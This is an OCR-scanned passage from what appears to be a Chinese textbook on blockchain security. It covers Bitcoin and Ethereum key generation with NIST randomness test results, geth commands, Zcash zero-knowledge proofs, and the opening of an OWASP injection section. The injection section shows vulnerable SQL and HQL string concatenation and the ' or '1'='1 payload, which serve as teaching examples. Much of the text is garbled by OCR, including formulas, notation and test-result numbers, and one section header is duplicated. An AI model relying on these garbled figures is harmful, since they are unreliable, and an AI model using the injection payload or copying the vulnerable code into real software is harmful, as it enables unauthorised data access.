Sbb16895dd94d9b354aal19d907124fb95ac20f21865ada549614d569e484779147394492204fdde698e5b3d3 
ddld6fd18961bec8cS5daaal8ea448424785734185080abaeS5a4022068d2bb9c6cf1i4e33129608424595cfbf9b 
8068b2d51cacS549e454ce39aa976f66914c695221039f803c7986969b56825dcafbb6c85c1f84964006a337c9d47 
b3albef7a5d835d8972102c870602256f942039aec374a1164e9168128ada4ddad498c962a50fdbf39e375c21 
63fd9030258cdfl6991l1335db26ef9fc7a3ae3563ff8b1l356afeb8ldd95b8lbfdf5653aeffffffffo2891d2c64 
00006000601976a914a4abe7500b3f7bb2ebd76b4a8fldb9969b79dbefc88ace9g3cc890910990600001976a91490e34 
abbd759901843cb9240cbcb3d841daa9de8388ac0000099699"， 

"comnplete”": true 
j 


Ee 
EE 
Ee 
PE 
~ 
> 
= 
字 
| 
{ 





此 时 ，complete 字 段 为 true， 表 明 交 易 创建 完成 ， 可 以 使 用 ./bitcoin-cli sendrawtransaction<hexstring> 发 送 了 。 在 真实 的 比特 币 网 络 中 ， 等 待 6 次 确认 后 ， 就 可 以 通过 ./bitcoin-cli- 
getreceivedbyaddress<bitcoinaddress> 来 查看 是 否 收 到 了 转 入 金额 。 


比特 币 密 钥 生 成 时 会 调用 bitcoin/src/random.cpp 中 的 GetstrongRandBytes 函 数 来 生成 随机 数 。 这 个 国 数 会 先 调 用 OpenssL 中 的 GetRandBytes 卫 数 生成 256bit 随 机 数 ; 再 调用 GetOSRand 函 数 生 
成 256bit 随 机 数 ; 随后 如 果 能 获取 ， 就 会 调用 硬件 的 随机 数 生成 函数 CetHWRand 来 生成 256bit 随 机 数 。 接 着 把 这 3 部 分 串 接 在 一 起 ， 使 用 Hash 函 数 生成 一 个 512bit 的 随机 数 。 最 后 取出 前 256bit 作 为 密 
铀 。 为 了 测试 比特 币 密 钥 的 随机 性 ， 调 用 GetStrongRandBytes 函 数 生成 了 1200 个 长 度 为 106 的 随机 数 比特 流 ， 然 后 使 用 NIST STS 的 随机 数 测试 套件 对 这 个 比特 流 进 行 了 测试 。NIST STS 的 随机 数 测试 套 
件 一 共有 15 项 测试 : 单 比特 频数 检测 、 块 内 频数 检测 、 累 加 和 检测 、 游 程 检测 、 块 内 最 大 “1” 游程 检测 、 和 矩阵 秩 检测 、 离 散 传 里 叶 检 测 、 非 周期 模块 匹配 检测 、 重 赤 模 块 匹配 检测 、 通 用 统计 检测 、 近 似 
检 测 、 随 机 游 动 检测 、 随 机 游 动 变 体检 测 、 序 列 检 测 、 线 性 复杂 性 检测 。 测 试 结果 如 图 2-8 所 示 。 


由 于 测试 结果 很 长 ， 在 此 只 截取 了 前 后 两 部 分 。 从 中 可 以 看 出 ， 绝 大 部 分 比特 流 都 通过 了 测试 ， 仅 有 极 少数 比特 流 没有 通过 。 比 如 Frequency 测 试 中 ， 在 1200 个 比特 流 中 通过 了 1188 个 ， 而 底部 的 测 
试 结论 已 经 说 明 “ 在 1200 个 中 只 要 通过 1177 个 就 表明 这 一 项 测试 通过 ”。 只 有 random excursion (variant) 测试 例外 ， 只 要 在 740 个 样本 中 ， 大 于 724 个 通过 就 行 了 。 从 以 上 测试 分 析 可 
知 ，GetStrongRandBytes 生 成 的 随机 数 通 过 了 NIST STS 的 所 有 15 项 测试 。 所 以 ， 比 特 币 中 的 密 钥 是 一 个 足够 随机 的 数 。 


P-VALUE 


0 .138133 
0.689019 
昌 .76093527 
0.955082 
9.701024 
0.478196 
0.644060 
0.731550 
0.581770 


0.739918 
0.1344835 
0.191687 
0.015065 


1188/1269 
1191/1266 
1189/1269 
1186/1266 
1185/1269 
1185/1266 
1199/1269 
1192/1266 
1191/1269 


734/749 
1184/1269 
1189/1269 
1185/1269 


PROPORTION STATISTICAL TEST 


Frequency 
BlockFrequency 
CumulativeSums 
CumulativeSums 

RUns 

LongestRun 

Rank 

FFT 

NonOver LappingTemplate 


RandomExcursionsVariant 
Serial 

Serial 

LinearComplexity 


The minimum pass rate for each statistical test with the exception of the 


random excursion (variant) test is approximately 


sample size 


= 128090 binary sequences. 


1177 for a 


The minimum pass rate for the random excursion (variant) test 


LS approximately = 724 for a sample size = 740 binary Sequences . 


For further guidelines construct a probability table using the MAPLE program 
provided in the addendum section of the documentation. 


图 2-8 ”GetStrongRandBytes 生 成 的 随机 数 测试 


[1] Koblitz N. Elliptic curve cryptosystems [J] .Mathematics of Computation, 1987, 48 (177): 203-209. 


2] Diff ie W, Hellman M E. New directions in ctyptography [LJ] . 
[3] Rivest R, Shamir A, Adleman L M. A method for obtaining digital signatures and public-key ctyptosystems [|]J」 . 


以 太 币 (ETH) 是 以 太 坊 (Ethereum) 中 的 一 种 数字 代 币 。 和 其 他 数字 货 
项 目 。 以 太 坊 客户 端的 源 代 码 地 址 参见 : 


下 载 go-ethereum 源 代码 : git clone https://github.com/ethereu 


命令 
geth 


ablgen 


bootnode 


表 2-1 以太 坊 命令 


描 


以 太 坊 命令 行 客户 端 。 它 是 以 太 坊 网 络 的 人 口 点 ， 
行 。 它 可 以 被 其 他 进程 通过 JSON RPC 端点 用 作 网 关 进 入 以 太 坊 网 络 。 使 用 geth -help 可 以 查看 帮助 


一 个 源 代码 生成 带 。 它 将 以 太 坊 合约 定义 转换 为 易于 使 用 的 、 编 译 安全 的 Go 语言 


Feum.git。 然后 用 make all 命 令 令 进 4 J 编译 ， 


IEEE Transactions on Information Theory, 1976, 22(0): 644-654. 
Communications of the ACM, 1983, 26(2): 96-99. 


述 


节 码 也 可 用 时 ， 它 就 会 在 简单 的 以 太 坊 合约 ABI 上 进行 扩展 


以 太 坊 客户 端的 简化 版 本 。 它 只 参 


与 网 络 市 太 发 现 协 议 , 但 不 i 


能 够 作为 一 个 完整 节 





一 样 ， 以 太 币 可 以 在 交易 平台 上 进行 买卖 。2013 年 年 末 ， 以 太 坊 创始 人 Vitalik Buterin 发 布 了 以 太 坊 初版 白皮书 ， 启 动 了 
。 目 前 有 C++、Go 等 多 个 版 本 ， 在 此 针对 Go 版 本 进行 介绍 。 


完成 后 将 在 build/bin 文 件 夹 中 生成 如 表 2-1 所 示 的 可 执行 文件 。 


点 、 存 档 节 点 或 轻 节 点 运 
。 当 合约 字 


行 任何 更 高 级 别 的 应 用 程序 押 


“运作 


议 。 它 可 以 作为 一 个 轻 量 级 的 引导 节点 来 帮助 在 私有 网 络 中 寻找 对 等 节 氮 





有 以 太 坊 虚拟 机 的 开发 工具 版 本 。 尼 ee 的 环境 和 执行 模式 下 运行 字 节 码 代码 片段 ， 
其 目的 是 允许 对 以 太 坊 虚拟 机 操作 码 进行 隅 离 的 、 细 粒度 的 调试 
NN 测试 套件 的 开发 工具 ， 用 于 验证 是 否 满足 以 太 坊 JSON RPC 标准 。 参 阅 测试 套件 的 Readme 可 


狄 得 许 细 信息 
rlpdump 一 种 开发 工具 ， 用 于 把 二 进 制 递归 长 度 的 前 级 数据 转换 成 用 户 易 于 理解 的 形式 
Swarm 守护 程序 和 工具 。 这 是 Swarm 网 络 的 人 口 点 。 使 用 swarm -help 可 以 查看 帮助 。 在 https:// 


Pe swarm-guide.readthedocs.io 中 可 以 查看 Swarm 文档 
puppeth 帮助 创建 新 的 以 太 坊 网 络 的 命令 行 癌 导 


通常 情况 下 ， 人 们 只 想 与 以 太 坊 网 络 进行 交互 一 一 创建 账户 、 转 移 资 金 、 部 署 并 与 合约 进行 交互 ， 很 少 关心 历史 数据 ， 所 以 可 以 用 以 下 命令 快速 地 同步 到 网 络 的 当前 状态 。 











$ ./geth --fast --cache=512 console 


对 于 以 太 坊 的 开发 者 ， 在 开发 过 程 中 往往 希望 创建 以 大 坊 智 能 合约 时 ， 并 不 需要 支付 真实 的 费用 。 在 这 种 情况 下 ， 开 发 者 不 需要 连接 到 主 网 络 ， 而 是 通过 节点 连接 到 测试 网 络 。 测 试 网 络 的 功能 几乎 
与 主 网 络 完全 相同 ， 只 是 使 用 以 太 测 试 币 。 

















$ ./geth --testnet --fast --cache=512 console 








其 中 ，-testnet 表 明 连 接 到 测试 网 络 ， 并 创建 文件 夹 ~/.ethereumytestnet， 测 试 网 络 的 数据 都 会 存放 在 这 个 文件 夹 中 。 对 于 新 用 户 ， 需 要 先 创建 一 个 账号 : 





>Ppersonal .newAccount (“password”) 


账号 创建 完成 后 ， 可 以 使 用 >eth.accounts 来 查看 。 创 建 账号 的 同时 ， 会 生成 一 个 用 于 以 太 坊 交易 的 密 钥 ， 存 放 在 ~/.ethereum/testnet/keystore 中 。 这 里 的 密 钥 在 加 密 后 进行 存储 ， 使 用 的 加 密 算 
法 是 AES-128， 而 AES-128 加 密 所 用 的 密 钥 就 是 创建 账号 时 用 户 输入 的 口令 。 备 份 密 钥 时 ， 只 需 把 keystore 中 的 文件 复制 到 目标 文件 夹 中 ， 同 时 还 要 备份 创建 账号 时 的 口令 。 为 了 达到 更 高 的 安全 性 ， 建 
议 把 密 钥 备份 到 多 个 不 同 的 地 方 ， 以 便 防范 火灾 、 洪 水 、 地 震 等 风险 。 


冷 存储 可 以 提高 密 钥 的 安全 性 。 在 一 台 离 线 的 计算 机 上 生成 以 太 币 地 址 和 私 钥 ， 由 这 人 台 计 算 机 生成 的 私 钥 永远 不 会 在 其 他 计算 机 或 者 网 络 上 出 现 。 以 太 币 可 以 友 到 这 个 离线 生成 的 地 址 上 进行 保存 ; 


使 用 这 些 以 太 币 时 ， 需 要 在 离线 计算 机 上 签名 。 目 前 ， 以 太 坊 官方 go-ethereum 钱 包 1.6 版 本 还 未 实现 离线 签名 功能 ， 所 以 还 不 支持 冷 存 储 。 可 以 使 用 其 他 工具 进行 冷 存 储 ， 比 如 icebox 工 具 
(https://github.com/ConsenSys/icebox) 。 


多 重 签名 也 有 助 于 提高 以 太 币 的 安全 性 。 可 惜 我们 在 以 太 坊 官方 go-ethereum 钱 包 1.6 版 本 中 没有 发 现 生 成 多 重 签名 的 命令 ， 但 可 在 官方 发 布 的 Web 浏 览 器 Mist 上 生成 多 重 签名 的 钱包 合约 。 


对 以 太 坊 交易 进行 签名 的 也 是 ECDSA 算 法 。 事 实 上 ， 以 太 坊 和 比特 币 调 用 了 相同 的 secp256k1 代 码 库 。 使 用 的 椭圆 曲线 是 secp256k1:E(y):y*=x3+7， 其 中 p=2236-232-29-28-27-26-24-1 (这 里 p 是 
一 个 256bit 的 素数 ) 。 签 名 时 生成 的 密 钥 也 是 256bit。 密 钥 的 长 度 决定 了 李 圆 曲线 密码 的 安全 强度 ， 密 钥 越 长 ， 安 全 性 就 越 强 。 椭 圆 曲 线 密 码 的 数学 安全 基础 是 椭圆 曲线 离散 对 数 问 题 (ECDLP) ， 它 决 
定 着 椭圆 曲线 密码 的 存在 和 使 用 。 对 于 规模 不 是 非常 大 的 ECDLP， 在 现实 中 可 以 使 用 Pollard rho 算法 求解 出 来 。 


以 太 坊 中 生成 密 钥 时 调用 了 Golang 语 言 的 rand 包 中 的 Reader， 它 是 一 个 密码 应 用 的 伪 随 机 生成 器 。 在 Linux 系 统 中 ， 当 getrandom(2) 可 获取 时 ，Reader 就 会 调用 这 个 函数 ， 否 则 会 调 
用 /dev/urandom; 在 Windows 系 统 中 ，Reader 将 使 用 CryptGenRandom 接 口 。 为 了 测试 rand.Reader 生 成 的 随机 数 是 否 足 够 随机 ， 我 们 用 它 生成 了 1200 个 长 度 为 106 的 比特 流 ， 然 后 使 用 NIST STS 的 
随机 数 测试 套件 对 这 些 比 特 流 进行 了 测试 。NIST STS 的 随机 数 测试 套件 一 共有 15 项 测试 : 单 比特 频数 检测 、 块 内 频数 检测 、 累 加 和 检测 、 游 程 检测 、 块 内 最 大 “1” 游 程 检测 、 和 矩阵 秩 检 测 、 离 散 传 里 叶 
检测 、 非 周期 模块 匹配 检测 、 重 老 模 块 匹 配 检 测 、 通 用 统计 检测 、 近 似 检 测 、 随 机 游 动 检测 、 随 机 游 动 变 体检 测 、 序 列 检 测 、 线 性 复杂 性 检测 。 测 试 结果 如 图 2-9 所 示 。 
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9 .4352799 
9.0704425 
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9.649780 
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1183/11269 
1191/1266 
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Frequency 
BlockFrequency 
CumulativeSums 
CumulativeSums 

Runs 
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Rank 
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NonOver lappingTemplate 


RandomExcursionsVariant 
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Serial 
LinearComplexity 


0.025052 
9.670050 


1197/1269 
1189/1200 


The minimum pass rate for each statistical test with the exception of the 
random excursion (variant) test is approximately = 1177 for a 
sample size = 1200 binary sequences . 


The minimum pass rate for the random excursion (variant) test 
is approximately = 733 for a sample size = 749 binary sequences . 


For further guidelines construct a probability table using the MAPLE progranm 
provided in the addendum section of the documentation. 





图 2-9 ”rand.Reader 随 机 性 测试 


由 于 分 析 结 果 很 长 ， 在 此 只 截取 了 前 后 两 部 分 内 容 。 从 图 2-9 中 可 以 看 出 ， 绝 大 部 分 比特 流 都 通过 了 测试 ， 仅 有 很 少 的 比特 流 没有 通过 。 比 如 serial 测试 中 ， 在 1200 个 样本 中 通过 了 1197 个 ， 而 只 要 大 
于 1177 就 说 明 这 项 测试 通过 。 只 有 random excursion (variant) 测试 例外 ， 只 要 在 749 个 样本 中 ， 大 于 733 个 通过 就 行 了 。 从 整个 分 析 报 告 可 知 ，rand.Reader 生 成 的 随机 数 通 过 了 NIST STS 的 所 有 15 项 
测试 。 所 以 ， 以 太 坊 中 的 密 钥 是 一 个 足够 随机 的 数 。 需 要 指出 的 是 ， 在 Golang 语 言 中 还 有 一 个 math/rand 包 ， 虽 然 它 也 可 以 生成 随机 数 ， 但 是 当 生 成 密码 学 应 用 领域 的 随机 数 时 ， 最 好 还 是 使 用 
crypto/rand 包 ， 特 别 是 密 钥 的 生成 。 


Zcash 是 一 种 开源 的 、 去 中 心 化 的 数字 货币 ，2016 年 10 月 开始 发 行 。 其 特点 是 隐私 性 更 好 。Zcash 主 要 包括 Setup、CreateAddress、Mint、Pour、VerifyTransaction 和 Receive 六 个 过 程 。 它 在 
Bitcoin Core 的 基础 上 增加 了 零 知识 证 明 协 议 ， 使 得 交易 可 以 验证 ， 但 交易 的 参与 者 以 及 交易 金额 可 以 不 公开 。 

零 知识 证 明 协 议 (示意 图 见 图 2-10) 是 证 明 者 能 够 在 不 泄漏 任何 有 用 信息 的 情况 下 ， 使 验证 者 相信 他 知道 一 个 秘密 。Goldwasser 等 人 在 1985 年 最 先 提出 了 交互 式 零 知 识 证 明 。 由 于 交互 式 证 明 要 求 
交互 的 各 方 同 时 在 线 ， 而 且 证 明 过 程 比 较 耗 时 ， 于 是 1988 年 又 提出 了 非 交 互 式 零 知识 证 明 。 图 2-10 是 一 个 简单 的 非 交 互 零 知 识 证 明 协 议 ' !。 假 设 Alice 计 划 证 明 她 知道 一 个 秘密 x， 并 且 x 满 足 离散 对 数 


y=g* mod p。 


Alice 协商 py,g Bob 





随机 选择 vEZ 
计算 1= wmodp 


c= Hasn(s Wd 





验证 1 三 g’ y mod 2 是 否 成 立 





ES 力 
r:=v—-cxmodp-1 





图 2-10” 堆 知识 证 明 协 议 


零 知 识 证 明 实 质 上 是 一 种 涉及 两 方 或 更 多 方 的 协议 ， 即 两 方 或 更 多 方 完成 一 项 任务 所 需 采 取 的 一 系列 步骤 。 一 个 零 知识 证 明 协 议 包 含 3 种 算法 : KeyGen，Prove 和 Verify。KeyGen 是 一 种 随机 算法 ， 
输入 公共 参数 ， 输 出 证 明 密 钥 pk 和 验证 公 钥 vk; Prove 算 法 输入 证 明 公 钥 pk、 实 例 x 以 及 证 据 8， 输 出 一 个 零 知识 证 明 nt; Verify 算 法 则 输入 验证 密 钥 sk、 实 例 x 以 及 证 明 r， 输 出 一 个 判定 比特 。 一 个 零 知 
识 证 明 必 须 满足 以 下 几 个 条 件 。 

1) 完备 性 ， 如 果 论 断 是 真 的 ， 诚 实 的 证 明 者 能 够 说 服 诚实 的 验证 者 ， 相 信 这 个 事实 。 


2) 可 靠 性 ， 如 果 论 断 是 假 的 ， 除 了 一 些小 概率 ， 不 诚实 的 证 明 者 无 法 说 服 诚实 的 验证 者 ， 相 信 该 论断 是 真 的 。 


— 


3) 零 知 识 ， 如 果 论 断 是 真 的 ， 不 诚实 的 验证 者 将 不 能 获得 其 他 任何 信息 ， 除 了 该 论断 是 真 的 。 


4) 零 知 识 证 明 协议 的 核心 使 用 了 同 态 隐藏 函数 ， 同 态 隐藏 E00 是 这 样 一 类 函数 ， 即 满足 不 可 逆 、 唯 一 性 和 生态 性 的 函数 。 


— 


Q@ 不 可 逆 : 对 于 大 部 分 x， 给 定 E(x)， 很 难 计算 出 x。 

@ 唯 一 性 : 对 于 不 同 的 输入 ， 输 出 也 不 同 ， 即 当 xzy 时 ，E(x)z*E(y)。 

@ 同 态 性 : E(x)*E(y)=E(xoy)。 其 中 o 是 浮 数 E(X) 定 义 域 中 的 运算 ，* 是 函数 E(x) 值 域 中 的 运算 。 

利用 这 类 函数 的 同 态 性 ， 在 证 明 时 只 需 对 值 域 中 的 元 素 E(x)、E(y) 操 作 ， 就 可 以 知道 定义 域 中 的 元 素 x、y 满 足 什 么 关系 。 同 时 ， 又 因为 具有 不 可 逆 性 ， 攻 击 者 无 法 从 E(x) 逆 推出 秘密 x。 
Zcash 提 供 两 种 地 址 : t- 地 址 和 z- 地 址 。 其 中 t- 地 址 是 公开 地 址 ， 就 像 比特 币 中 的 地 址 ;而 z- 地 址 是 秘密 地 址 。 下 面 将 描述 如 何在 z- 地 址 之 间 进 行 交 易 ， 达 到 保护 隐私 的 目的 。 


假设 某 个 节点 已 经 正确 接收 到 了 未 消费 交易 的 输出 (UTXO) ， 不 妨 用 未 消费 note 表 示 每 一 个 UTXO。 其 中 包含 了 地 址 和 资金 ， 而 地 址 其 实 就 是 公 铀 。 简 单 起 见 ， 假 设 每 一 个 note 只 含有 1 元 ， 而 且 每 
一 个 地 址 至 多 只 有 一 个 note。 那 么 ， 在 某 一 时 刻 ， 该 节点 的 数据 库 中 包含 了 未 消费 note 的 列表 ， 而 且 每 一 个 note 可 以 简单 地 用 地 址 来 表示 ， 比 如 : 


Note1=(PK1),Note=(PK2),Note3=(PK3) 
事实 上 ， 为 了 增强 隐私 性 ， 每 个 note 中 还 可 以 添加 一 个 随机 数 六 
Note1=(PK1,r),Notes= (PK,r2), Notes=(PK3,r3) 
然后 使 用 Hash 函 数 进 行 压缩 ， 使 得 它们 不 可 逆 : 
H1=HASH(Note1),Hy=HASH(Note’),H3=HASH(Note;) 
为 了 区 分 已 经 消费 和 未 消费 的 note， 需 要 引入 一 个 废弃 集合 (Nullif ier Set) ， 这 个 集合 记录 了 已 经 消费 的 note 中 随机 数 的 Hash 值 ， 如 表 2-2 所 示 。 
表 2-2 NOTE 集 合 与 废弃 集合 的 区 别 
Hashed Notes Nullifier Set 

H, = HASH (Note,)) nf = HASH (7,) 

H, = HASH (Note,) 

H; = HASH (Note;) 
现在 不 妨 设 PK1 是 张 三 的 地 址 ， 他 准备 把 1 元 支付 给 李 四 ， 李 四 的 地 址 为 PK4。 假 设 张 三 和 李 四 构 建 了 一 个 秘密 通信 人 信道， 当然， 这 个 秘密 信道 在 Zcash 中 并 不 是 必需 的 。 张 三 执行 如 下 步骤 : 
1) 他 选择 一 个 随机 数 r4， 并 定义 新 的 note: 
Node4=(PK4t) 


2) 他 通过 秘密 通信 信道 把 Node4 发 送 给 李 四 。 


当 各 个 节点 接收 到 nf2 和 H4 后 ， 就 会 验证 nf2 对 应 的 note 是 否 已 经 消费 。 验 证 方法 也 很 简单 ， 只 需 验 证 nf2 是 否 已 经 在 废弃 集合 中 。 如 果 没 有 在 废弃 集合 中 ， 就 把 nf2 加 入 废弃 集合 ， 同 时 把 H4 加 入 
Hashed Notes 和 集合 ， 如 表 2-3 所 示 。 


表 2-3 更 新 后 的 集合 


Hashed Notes Nullifier Set 
H., = HASH (Note)) nf = HASH (7,) 
H, = HASH (Note,) nf,= HASH (7) 


H, = HASH (Note,) 
在 以 上 步骤 中 ， 各 个 节点 验证 了 Node1 未 消费 ， 但 没有 验证 Node1 属 于 张 三 ， 甚 至 没有 验证 它 是 一 个 合法 的 note， 即 计算 Node1 的 Hash 值 ， 再 确认 这 个 Hash 值 的 确 在 hashed notes 集 合 中 。 有 一 种 


简单 的 方法 ， 是 张 三 公 开 Node1 来 证 明 他 拥有 Node1， 但 这 又 丧失 了 隐私 性 。 所 以 ，Zcash 使 用 了 零 知识 证 明 。 张 三 公开 一个 证 明 r 使 得 其 他 节点 相信 : 无 论 谁 发 布 这 笔 交 易 ， 他 就 知道 公 钥 PK1、 私 负 
sk1 和 随机 数 r1 的 值 ， 而 目 满足 : 


1) Node1=(PK1,r1) 的 Hash 值 在 Hashed Notes 集 合 

2) sk1 是 公 铀 PK1 对 应 的 私 铀 ， 知 道 sk1 的 用 户 就 意味 着 拥有 Note1 ; 

3) r1 的 Hash 值 是 nf2。 

零 知识 证 明 的 特性 能 确保 PK1、sk1 和 r1 不 会 泄漏 。 为 了 通俗 易 懂 ， 我 们 忽略 了 很 多 的 细节 ， 有 兴趣 的 读者 可 以 查阅 Zcash 的 协议 标准 。 


假设 地 址 为 ( 党 。% 的 用 户 u 计 划 使 用 他 的 资产 c9d=(awv9ld pold,roldsold cm9d)， 输 出 两 笔 新 的 资产 C2 满足 WW + = vw， 分 别 对 应 公 钥 地 址 ? 窜 和 ? 台 ?。 用 户 u 针 对 ie{1,2} 执 行 下 列 步骤 。 (1) 
用 户 u 选 择 随机 数 P7"; (2) 用 户 u 使 用 随机 数 "”" 计 算 #”= COMMm (党 1 PY)， (3) 用户 u 使 用 随机 数 ?” 计 算 cm 一 COMM (| 8)。 则 OO vp 5, on) 
Ca YP， 7 ,530, cm 让 )。 然 后 用 户 u 产 生 一 个 NP 论断 的 zk-SNARK 零 知识 证 明 mtpoUR。 最 后 把 交易 txpour:=(rt,sn99,cm”, Cm2 TPOUR) 放 到 区 块 链 账 本 中 。 当 用 户 u 不 知道 公 铀 地 址 “w* 对 应 


的 私 钥 地 址 4w*" 时 ， 他 就 无 法 使 用 C1 ”， 因 为 他 需要 在 下 一 次 交易 中 提供 4*"' 作 为 证 据 的 一 部 分 。 当 某 用 户 知道 4 并 使 用 CY 时 ， 用 户 u' 也 无 法 跟踪 这 笔 交易 ， 因 为 从 序列 号 92” := PRA, CO ) 无 法 得 到 任 
何 有 用 信息 。 加 


[1] Kocher P, Jaffe J, Juan B. Differential Powet Analysis: Leaking Secrets [C] // International Crytology Conference. 1999. 


[2] Eric Brier, Joye M. WeierstraB Elliptic Curves and Side-Channel Attacks [M] // Public Key Cryptography. Springer Berlin Heidelberg, 2002: 335-345. 


2.4 ”本 章 小 结 


本 章 以 几 大 主流 区 块 链 平台 为 例 ， 对 其 代码 、 密 码 学 算法 以 及 钱包 进行 了 安全 性 分 析 ， 同 时 系统 介绍 了 主要 的 加 密 算法 、 隐 私 保护 算法 、 签 名 算法 ， 使 读者 可 以 对 区 块 链 安全 技术 有 一 个 初步 的 认 


] 口 


第 3 草 ”应 用 与 智能 合约 层 的 安全 控制 


3.1 Web 与 移动 客户 端 应 用 安全 


一 个 面向 终端 用 户 的 区 块 链 项 目 都 会 有 Web 或 者 移动 的 客户 端 应 用 程序 。 对 于 这 些 客户 端的 应 用 程序 ， 我 们 需要 了 解 由 于 编程 不 小 心 引 起 的 安全 风险 。 在 此 需要 介绍 一 下 开放 式 Web 应 用 程序 安全 项 
目 (Open Web Application Security Project，OWASP) 。 开 放 式 Web 应 用 程序 安全 项 目 是 一 个 开源 组 织 ， 主 要 提供 有 关 计 算 机 和 互联 网 应 用 程序 的 安全 信息 ， 旨 在 协助 个 人 、 企 业 和 机 构 来 发 现 和 使 
用 安全 可 信 的 应 用 软件 。OWAsP 中 有 一 个 名 为 Top 10 的 项 目 ， 其 目标 是 找 出 Web 应 用 系统 所 面临 的 最 严重 的 风险 ， 提 高 人 们 对 应 用 程序 安全 的 关注 度 。Top 10 项 目 被 众多 标准 、 书 籍 、 工 具 和 相关 组 织 
引用 ， 包 括 MITRE、PCI DSS、DISA、FTC 等 。OWASP Top 10 最 初 于 2003 年 发 布 ， 并 于 2004 年 和 2007 年 相继 做 了 少许 的 修改 更 新 。OWASP Top 102010 版 做 了 大 量 修改 以 对 风险 进行 排序 ， 而 不 仅仅 
针对 流行 程度 。 这 种 模式 在 其 2013 版 和 最 新 的 2017 版 得 到 了 延续 。 下 面 介绍 OWASP Top 10 的 安全 漏洞 。 


第 3 草 ”应 用 与 智能 合约 层 的 安全 控制 


3.1 ”Web 与 移动 客 尸 映 应 用 安全 


一 个 面向 终端 用 户 的 区 块 链 项 目 都 会 有 Web 或 者 移动 的 客户 端 应 用 程序 。 对 于 这 些 客户 端的 应 用 程序 ， 我 们 需要 了 解 由 于 编程 不 小 心 引 起 的 安全 风险 。 在 此 需要 介绍 一 下 开放 式 Web 应 用 程序 安全 项 
目 (Open Web Application Security Project，OWASP) 。 开 放 式 Web 应 用 程序 安全 项 目 是 一 个 开源 组 织 ， 主 要 提供 有 关 计算 机 和 互联 网 应 用 程序 的 安全 信息 ， 旨 在 协助 个 人 、 企 业 和 机 构 来 发 现 和 使 
用 安全 可 信 的 应 用 软件 。OWAsP 中 有 一 个 名 为 Top 10 的 项 目 ， 其 目标 是 找 出 Web 应 用 系统 所 面临 的 最 严重 的 风险 ， 提 高 人 们 对 应 用 程序 安全 的 关注 度 。Top 10 项 目 被 众多 标准 、 书 籍 、 工 具 和 相关 组 织 
引用 ， 包 括 MITRE、PCI DSS、DISA、FTC 等 。OWASP Top 10 最 初 于 2003 年 发 布 ， 并 于 2004 年 和 2007 年 相继 做 了 少许 的 修改 更 新 。OWASP Top 102010 版 做 了 大 量 修 改 以 对 风险 进行 排序 ， 而 不 仅仅 


针对 流行 程度 。 这 种 模式 在 其 2013 版 和 最 新 的 2017 版 得 到 了 延续 。 下 面 介绍 OWASP Top 10 的 安全 漏洞 。 


3.1.1 注入 


注入 ， 即 注入 缺陷 ， 例 如 SQL 注入 、Os 命 令 注 入 、LDAP 注 入 等 ， 会 在 攻击 者 向 应 用 服务 端 发 送 以 分 隔 符 作 为 命令 或 者 查询 的 一 部 分 时 上 发生。 攻击 者 的 有 害 数 据 中 分 隔 符 造 成 的 陷阱 ， 会 执行 攻击 构 
造 的 未 预知 的 命令 或 者 访问 未 授权 数据 。 


1. 是 否 存 在 注入 漏洞 


检测 应 用 程序 是 否 存在 注入 漏洞 ， 最 好 的 办 法 就 是 确认 所 有 解释 器 的 使 用 都 明确 地 将 不 可 信 数 据 从 命令 语句 或 查询 语句 中 区 分 开 来 。 在 许多 情况 下 ， 建 议 避 免 使 用 解释 器 或 禁用 它 (如 XXE) 。 对 于 
SQL 调用 ， 这 就 意味 着 在 所 有 准备 语句 (Prepared Statements) 和 存储 过 程 (Stored Procedures) 中 使 用 绑 定 变量 (Bind Variables) ， 并 避免 使 用 动态 查询 语句 。 


检查 应 用 程序 是 否 安全 使 用 解释 器 的 最 块 、 最 有 效 的 方法 是 代码 审查 。 代 码 分 析 工 具 能 帮助 安全 分 析 者 找到 使 用 解释 器 的 代码 并 追踪 应 用 的 数据 流 ， 渗 透 测 试 者 通过 创建 攻击 的 方法 来 确认 这 些 漏 
洞 。 


可 以 执行 应 用 程序 的 自动 动态 扫 摘 器 能 够 提供 一 些 信息 ， 帮 助 确 认 一 些 可 利用 的 注入 漏洞 是 否 存在 。 然 而 ， 扫 摘 器 并 非 总 能 达到 解释 器 ， 所 以 不 容易 检测 到 一 个 攻击 是 否 成 功 。 不 恰当 的 错误 处 理 使 
得 注入 漏洞 更 容易 被 友 现 。 
2. 如 何 防止 注入 漏洞 

防止 注入 漏洞 需要 将 不 可 信和 数据 从 命令 及 查询 中 区 分 开 。 

1) 最 佳 选择 是 使 用 安全 的 API， 完 全 避免 使 用 解释 器 或 提供 参数 化 界面 的 API。 但 要 注意 有 些 参 数 化 的 AP1， 比 如 存储 过 程 ， 如 果 使 用 不 当 ， 仍 然 可 以 引入 注入 漏洞 。 

2) 如 果 无 法 使 用 一 个 参数 化 的 AP1， 那 么 应 该 使 用 解释 器 具体 的 escape 语 法 来 避免 特殊 字符 。OWASP 的 ESAPI 就 有 一 些 escape 例 程 。 


3) 使 用 正面 的 或 “ 白 名 单 ” 中 的 恰当 的 、 规 范 化 的 输入 验证 方法 同样 有 助 于 防止 注入 攻击 。 但 由 于 很 多 应 用 在 输入 中 需要 特殊 字符 ， 这 一 方法 不 是 完整 的 防护 方法 。OWAsP 的 ESAPI 中 包含 一 
个 “和 白 名 单 ”输入 验证 例 程 的 扩展 库 。 


4) 在 区 块 链 项 目的 Web 端 ， 应 该 避免 动态 调用 智能 合约 。 现 在 大 部 分 区 块 链 的 数据 是 用 键 和 值 (Key/Value) 的 形式 存储 的 ， 应 该 避免 在 区 块 链 项 目的 Web 端 采用 不 可 信和 数据 。 也 有 一 些 区 块 链 有 
SQL 作为 数据 的 存储 ， 因 此 SQL 注入 也 是 这 些 区 块 链 项 目 需要 关注 的 问题 。 


3. 攻 击 案例 


案例 #1: 应 用 程序 在 下 面 人 存在 漏洞 的 SQL 语句 的 构造 中 使 用 不 可 信 数 据 。 








String query = "SELECT * FROM accounts WHERE 
CustID='" + request.getParameter ("id") + "'" 























案例 #2: 同样 的 ， 框 架 应 用 的 盲目 信任 ， 仍 然 可 能 导致 查询 语句 的 漏洞 (例如 : Hibernate 查 询 语言 (HQL) ) 。 


Query HOLQuery = session.createQuery ("FROM accounts 
WHERE custID='" + request.getParameter ("wid") + ™'"); 




















在 这 两 个 案例 中 ， 攻 击 者 在 浏览 器 中 将 "id" 参 数 的 值 修改 成 'or'1'='1。 如 : 


http:// example.com/app/accountView?id="' or '1'="] 





